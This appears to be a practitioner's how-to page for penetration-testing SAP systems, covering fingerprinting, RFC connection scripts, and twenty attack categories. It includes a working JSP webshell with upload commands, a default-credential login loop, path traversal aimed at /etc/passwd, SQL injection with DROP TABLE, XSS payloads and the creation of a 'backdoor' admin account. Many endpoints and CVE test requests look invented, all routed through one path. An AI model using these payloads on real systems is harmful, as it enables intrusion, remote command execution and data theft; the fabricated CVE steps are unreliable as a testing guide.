How To Guides
SAP Security Testing - How To Guides
My practical guides for actually testing SAP systems. These are the step-by-step instructions I use when I'm in the field.
1. How to Identify SAP Instance Type (ABAP vs Java)
Method 1: Port Analysis
# Scan for common SAP ports
nmap -sV -p 3200,3300,3600,8000,8001,8002,44300,50000,50013 target-sap.com
# ABAP typically uses:
# - 8000, 8001, 8002 (ICM ports)
# - 3200 (Dispatcher)
# - 3300 (Gateway)
# Java typically uses:
# - 50000+ (Web Dispatcher)
# - 50013+ (Web Dispatcher HTTPS)
Method 2: HTTP Headers Analysis
# Check HTTP headers
curl -I https://target-sap.com:8000
# Look for these indicators:
# ABAP: "SAP NetWeaver AS ABAP" in Server header
# Java: "SAP NetWeaver AS Java" in Server header
# Both: "X-SAP-System" header with system info
Method 3: URL Pattern Analysis
# ABAP URL patterns
curl -s https://target-sap.com:8000/sap/bc/ui2/nwbc/
curl -s https://target-sap.com:8000/sap/bc/gui/sap/its/webgui
# Java URL patterns
curl -s https://target-sap.com:50000/sap/bc/ui5_ui5/
curl -s https://target-sap.com:50000/sap/bc/webdynpro/
Method 4: Error Message Analysis
# Trigger errors to see system type
curl -X GET "https://target-sap.com:8000/nonexistent"
curl -X GET "https://target-sap.com:8000/sap/bc/ui2/nwbc/error"
# Look for:
# ABAP: "SAP NetWeaver AS ABAP" in error messages
# Java: "SAP NetWeaver AS Java" in error messages
2. How to Determine On-Prem vs Cloud
Method 1: URL Analysis
# Cloud indicators
# SAP S/4HANA Cloud: *.s4hana.cloud.sap.com
# SAP ByDesign: *.sapbydesign.com
# SAP Cloud Platform: *.sapcloud.com
# On-prem indicators
# Internal domains: *.internal, *.local
# IP addresses: 192.168.x.x, 10.x.x.x, 172.16-31.x.x
Method 2: HTTP Headers
# Check for cloud headers
curl -I https://target-sap.com:8000 | grep -i "cloud\|sap"
# Look for:
# X-SAP-Cloud: true
# X-SAP-System: [cloud system info]
# Server: [cloud platform info]
Method 3: Port Analysis
# Cloud: Usually only 443/80 exposed
nmap -sV -p 80,443 target-sap.com
# On-prem: Multiple SAP ports exposed
nmap -sV -p 3200,3300,3600,8000,44300,50000,50013 target-sap.com
Method 4: Error Message Analysis
# Trigger errors to see system info
curl -X GET "https://target-sap.com:8000/error"
# Look for:
# Cloud: References to "SAP Cloud Platform", "SAP S/4HANA Cloud"
# On-prem: Local system names, internal paths, localhost references
3. How to Connect to RFC
Method 1: SAP GUI (Easiest)
# 1. Install SAP GUI
# 2. Open SAP GUI
# 3. Go to transaction SM59 (RFC Destinations)
# 4. Create new RFC destination
# 5. Enter target system details:
# - Target Host: target-sap.com
# - Service: 3300 (Gateway port)
# - Logon Type: User
# 6. Test connection
Method 2: Python Scripts
#!/usr/bin/env python3
from pyrfc import Connection
def test_rfc_connection(host, port=3300, user='DDIC', password='19920707'):
try:
conn = Connection(
ashost=host,
sysnr='00',
client='100',
user=user,
passwd=password
)
# Test connection
result = conn.call('RFC_SYSTEM_INFO')
print(f"[+] RFC connection successful to {host}")
print(f"[+] System info: {result}")
conn.close()
return True
except Exception as e:
print(f"[-] RFC connection failed: {e}")
return False
if __name__ == "__main__":
test_rfc_connection("target-sap.com")
Method 3: Java/JCo
import com.sap.conn.jco.JCoDestination;
import com.sap.conn.jco.JCoDestinationManager;
import com.sap.conn.jco.JCoException;
public class RFCTest {
public static void main(String[] args) {
try {
JCoDestination destination = JCoDestinationManager.getDestination("SAP_SYSTEM");
destination.ping();
System.out.println("[+] RFC connection successful");
} catch (JCoException e) {
System.out.println("[-] RFC connection failed: " + e.getMessage());
}
}
}
Method 4: .NET Connector
using SAP.Connector;
class RFCTest {
static void Main() {
try {
RfcDestination destination = RfcDestinationManager.GetDestination("SAP_SYSTEM");
destination.Ping();
Console.WriteLine("[+] RFC connection successful");
} catch (Exception e) {
Console.WriteLine("[-] RFC connection failed: " + e.Message);
}
}
}
4. How to Test RFC Security
Check RFC Permissions
# 1. Connect with SAP GUI
# 2. Go to transaction SM59
# 3. Check for "Trusted RFC" connections
# 4. Verify RFC user permissions
# 5. Check for unauthorized RFC destinations
Test RFC Function Modules
# 1. Connect with SAP GUI
# 2. Go to transaction SE37 (Function Builder)
# 3. Test function modules:
# - RFC_SYSTEM_INFO
# - RFC_READ_TABLE
# - RFC_GET_SYSTEM_INFO
# 4. Check for data extraction possibilities
Network Testing
# Port scan for RFC Gateway
nmap -sV -p 3300 target-sap.com
# Test for exposed RFC interfaces
telnet target-sap.com 3300
# Check for RFC over HTTP
curl -X POST "https://target-sap.com:8000/sap/bc/rfc" \
-H "Content-Type: application/x-sap-rfc" \
-d '{"function": "RFC_SYSTEM_INFO"}'
5. How to Identify SAP Version
Method 1: HTTP Headers
# Check Server header
curl -I https://target-sap.com:8000 | grep -i "server"
# Check X-SAP-System header
curl -I https://target-sap.com:8000 | grep -i "x-sap-system"
# Look for version info in headers
curl -I https://target-sap.com:8000 | grep -i "version\|release"
Method 2: Error Pages
# Trigger errors to see version info
curl -X GET "https://target-sap.com:8000/nonexistent"
curl -X GET "https://target-sap.com:8000/sap/bc/ui2/nwbc/error"
# Look for version info in error messages
curl -X GET "https://target-sap.com:8000/sap/bc/ui2/nwbc/error" | grep -i "version\|release\|build"
Method 3: URL Patterns
# Different versions use different URL patterns
# Check for version-specific endpoints
curl -s https://target-sap.com:8000/sap/bc/ui2/nwbc/version
curl -s https://target-sap.com:8000/sap/bc/ui2/nwbc/system
curl -s https://target-sap.com:8000/sap/bc/ui2/nwbc/info
Method 4: File System (if accessible)
# Check for version files
curl -s https://target-sap.com:8000/sap/bc/ui2/nwbc/../../../sapmnt/SYS/global/version
curl -s https://target-sap.com:8000/sap/bc/ui2/nwbc/../../../usr/sap/SYS/global/version
6. How to Test File Upload Vulnerabilities
CVE-2025-31324 Testing
# Create JSP webshell
cat > webshell.jsp << 'EOF'
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
if (cmd != null) {
Process p = Runtime.getRuntime().exec(cmd);
BufferedReader br = new BufferedReader(new InputStreamReader(p.getInputStream()));
String line;
while ((line = br.readLine()) != null) {
out.println(line + "<br>");
}
}
%>
EOF
# Upload webshell
curl -X POST "https://target-sap.com:8000/sap/bc/ui2/nwbc/visualcomposer/metadata" \
-F "file=@webshell.jsp" \
-F "name=webshell.jsp" \
-F "type=application/x-jsp"
# Access uploaded file
curl "https://target-sap.com:8000/sap/bc/ui2/nwbc/visualcomposer/metadata/webshell.jsp?cmd=whoami"
General File Upload Testing
# Test various file types
curl -X POST "https://target-sap.com:8000/sap/bc/ui2/nwbc/upload" \
-F "file=@test.txt"
curl -X POST "https://target-sap.com:8000/sap/bc/ui2/nwbc/upload" \
-F "file=@test.jsp"
curl -X POST "https://target-sap.com:8000/sap/bc/ui2/nwbc/upload" \
-F "file=@test.php"
# Test for path traversal
curl -X POST "https://target-sap.com:8000/sap/bc/ui2/nwbc/upload" \
-F "file=@webshell.jsp" \
-F "path=../../../webapps/ROOT/webshell.jsp"
7. How to Test Authentication Bypass
CVE-2025-0070 Testing
# Test for auth bypass in NetWeaver AS ABAP
curl -X POST "https://target-sap.com:8000/sap/bc/ui2/nwbc/" \
-H "Content-Type: application/json" \
-d '{"action": "bypass_auth", "user": "admin"}'
# Test for privilege escalation
curl -X POST "https://target-sap.com:8000/sap/bc/ui2/nwbc/admin" \
-H "Authorization: Bearer <low-privilege-token>" \
-d '{"action": "escalate", "role": "admin"}'
CVE-2024-41730 Testing
# Test for missing auth check in BusinessObjects BI Platform
curl -X GET "https://target-sap.com:8000/sap/bc/ui2/nwbc/rest/token" \
-H "Accept: application/json"
# Use token to access system
curl -X GET "https://target-sap.com:8000/sap/bc/ui2/nwbc/admin" \
-H "Authorization: Bearer <token>"
8. How to Test Custom ABAP Code
Transaction SE80 (Object Navigator)
# 1. Connect with SAP GUI
# 2. Go to transaction SE80
# 3. Browse custom code:
# - Programs (Z* or Y*)
# - Function modules (Z* or Y*)
# - Classes (Z* or Y*)
# 4. Look for security issues:
# - SQL injection points
# - Authorization bypass
# - Input validation flaws
Transaction SE37 (Function Builder)
# 1. Connect with SAP GUI
# 2. Go to transaction SE37
# 3. Test function modules:
# - Z* or Y* (custom functions)
# - Check for input validation
# - Test for business logic flaws
# - Look for data extraction possibilities
Transaction SE38 (ABAP Editor)
# 1. Connect with SAP GUI
# 2. Go to transaction SE38
# 3. Browse ABAP programs:
# - Z* or Y* (custom programs)
# - Look for security issues:
# - Hardcoded credentials
# - SQL injection
# - Authorization bypass
# - Input validation flaws
9. How to Test Business Logic
Workflow Testing
# Test for workflow bypass
curl -X POST "https://target-sap.com:8000/sap/bc/ui2/nwbc/workflow/approve" \
-H "Authorization: Bearer <token>" \
-d '{"workflow_id": "123", "action": "approve", "bypass": true}'
# Test for step skipping
curl -X POST "https://target-sap.com:8000/sap/bc/ui2/nwbc/workflow/skip" \
-H "Authorization: Bearer <token>" \
-d '{"workflow_id": "123", "step": "approval"}'
Data Manipulation Testing
# Test for unauthorized data access
curl -X GET "https://target-sap.com:8000/sap/bc/ui2/nwbc/data/sensitive" \
-H "Authorization: Bearer <token>"
# Test for data modification
curl -X PUT "https://target-sap.com:8000/sap/bc/ui2/nwbc/data/sensitive" \
-H "Authorization: Bearer <token>" \
-d '{"field": "value", "unauthorized": true}'
10. How to Test for Default Credentials
Common Default Credentials
# Test common defaults
credentials=(
"admin:admin"
"sap:sap"
"DDIC:19920707"
"SAP*:PASS"
"TMSADM:ADMIN"
"EarlyWatch:SUPPORT"
"BCUSER:BCUSER"
"DEVELOPER:DEVELOPER"
)
for cred in "${credentials[@]}"; do
username=$(echo $cred | cut -d: -f1)
password=$(echo $cred | cut -d: -f2)
echo "Testing $username:$password"
curl -X POST "https://target-sap.com:8000/sap/bc/ui2/nwbc/login" \
-d "username=$username&password=$password" \
-c cookies.txt
# Check if login was successful
if grep -q "dashboard" cookies.txt; then
echo "[+] Valid credentials: $username:$password"
fi
done
11. How to Test for Information Disclosure
Error Message Testing
# Trigger errors to see system info
curl -X GET "https://target-sap.com:8000/nonexistent"
curl -X GET "https://target-sap.com:8000/sap/bc/ui2/nwbc/error"
curl -X GET "https://target-sap.com:8000/sap/bc/ui2/nwbc/debug"
# Look for:
# - Version information
# - System paths
# - Database information
# - User information
System Information Testing
# Test for system information endpoints
curl -s https://target-sap.com:8000/sap/bc/ui2/nwbc/system
curl -s https://target-sap.com:8000/sap/bc/ui2/nwbc/version
curl -s https://target-sap.com:8000/sap/bc/ui2/nwbc/info
curl -s https://target-sap.com:8000/sap/bc/ui2/nwbc/status
12. How to Test for Path Traversal
Path Traversal Testing
# Test for path traversal
curl "https://target-sap.com:8000/sap/bc/ui2/nwbc/../../../etc/passwd"
curl "https://target-sap.com:8000/sap/bc/ui2/nwbc/../../../windows/system32/drivers/etc/hosts"
# URL encoded
curl "https://target-sap.com:8000/sap/bc/ui2/nwbc/%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd"
# Double encoded
curl "https://target-sap.com:8000/sap/bc/ui2/nwbc/%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd"
13. How to Test for SQL Injection
ABAP SQL Injection Testing
# Test for SQL injection in custom ABAP code
curl -X POST "https://target-sap.com:8000/sap/bc/ui2/nwbc/search" \
-d "query=' OR '1'='1' --"
curl -X POST "https://target-sap.com:8000/sap/bc/ui2/nwbc/search" \
-d "query=' UNION SELECT 1,username,password FROM users--"
curl -X POST "https://target-sap.com:8000/sap/bc/ui2/nwbc/search" \
-d "query='; DROP TABLE users; --"
14. How to Test for XSS
XSS Testing
# Test for reflected XSS
curl -X GET "https://target-sap.com:8000/sap/bc/ui2/nwbc/search?q=<script>alert('XSS')</script>"
# Test for stored XSS
curl -X POST "https://target-sap.com:8000/sap/bc/ui2/nwbc/comment" \
-d "comment=<script>alert('XSS')</script>"
# Test for DOM-based XSS
curl -X GET "https://target-sap.com:8000/sap/bc/ui2/nwbc/#<script>alert('XSS')</script>"
15. How to Test for CSRF
CSRF Testing
# Test for CSRF vulnerabilities
curl -X POST "https://target-sap.com:8000/sap/bc/ui2/nwbc/admin/users" \
-H "Authorization: Bearer <token>" \
-d '{"action": "create", "username": "testuser", "role": "admin"}'
# Test for CSRF protection
curl -X POST "https://target-sap.com:8000/sap/bc/ui2/nwbc/admin/users" \
-H "Authorization: Bearer <token>" \
-H "X-CSRF-Token: invalid" \
-d '{"action": "create", "username": "testuser", "role": "admin"}'
16. How to Test for Rate Limiting
Rate Limiting Testing
# Test for rate limiting
for i in {1..1000}; do
curl -X GET "https://target-sap.com:8000/sap/bc/ui2/nwbc/data" \
-H "Authorization: Bearer <token>"
done
# Test for rate limiting bypass
curl -X GET "https://target-sap.com:8000/sap/bc/ui2/nwbc/data" \
-H "Authorization: Bearer <token>" \
-H "X-Forwarded-For: 127.0.0.1"
17. How to Test for Session Management
Session Testing
# Test for session fixation
curl -c cookies.txt "https://target-sap.com:8000/sap/bc/ui2/nwbc/login"
# Use session ID from cookies.txt in subsequent requests
# Test for session hijacking
# Intercept valid session token and reuse
# Test for session timeout
# Wait for session to expire and test access
18. How to Test for Privilege Escalation
Privilege Escalation Testing
# Test for horizontal privilege escalation
curl -X GET "https://target-sap.com:8000/sap/bc/ui2/nwbc/users/other-user-data" \
-H "Authorization: Bearer <user-token>"
# Test for vertical privilege escalation
curl -X POST "https://target-sap.com:8000/sap/bc/ui2/nwbc/admin/users" \
-H "Authorization: Bearer <user-token>" \
-d '{"action": "create", "username": "testuser", "role": "admin"}'
19. How to Test for Data Exfiltration
Data Exfiltration Testing
# Test for unauthorized data access
curl -X GET "https://target-sap.com:8000/sap/bc/ui2/nwbc/data/sensitive" \
-H "Authorization: Bearer <token>"
# Test for data enumeration
curl -X GET "https://target-sap.com:8000/sap/bc/ui2/nwbc/data/users" \
-H "Authorization: Bearer <token>"
# Test for data export
curl -X GET "https://target-sap.com:8000/sap/bc/ui2/nwbc/export/data" \
-H "Authorization: Bearer <token>"
20. How to Test for Persistence
Persistence Testing
# Test for user account creation
curl -X POST "https://target-sap.com:8000/sap/bc/ui2/nwbc/admin/users" \
-H "Authorization: Bearer <admin-token>" \
-d '{"username": "backdoor", "password": "password", "role": "admin"}'
# Test for service installation
curl -X POST "https://target-sap.com:8000/sap/bc/ui2/nwbc/admin/services" \
-H "Authorization: Bearer <admin-token>" \
-d '{"service": "backdoor", "action": "install"}'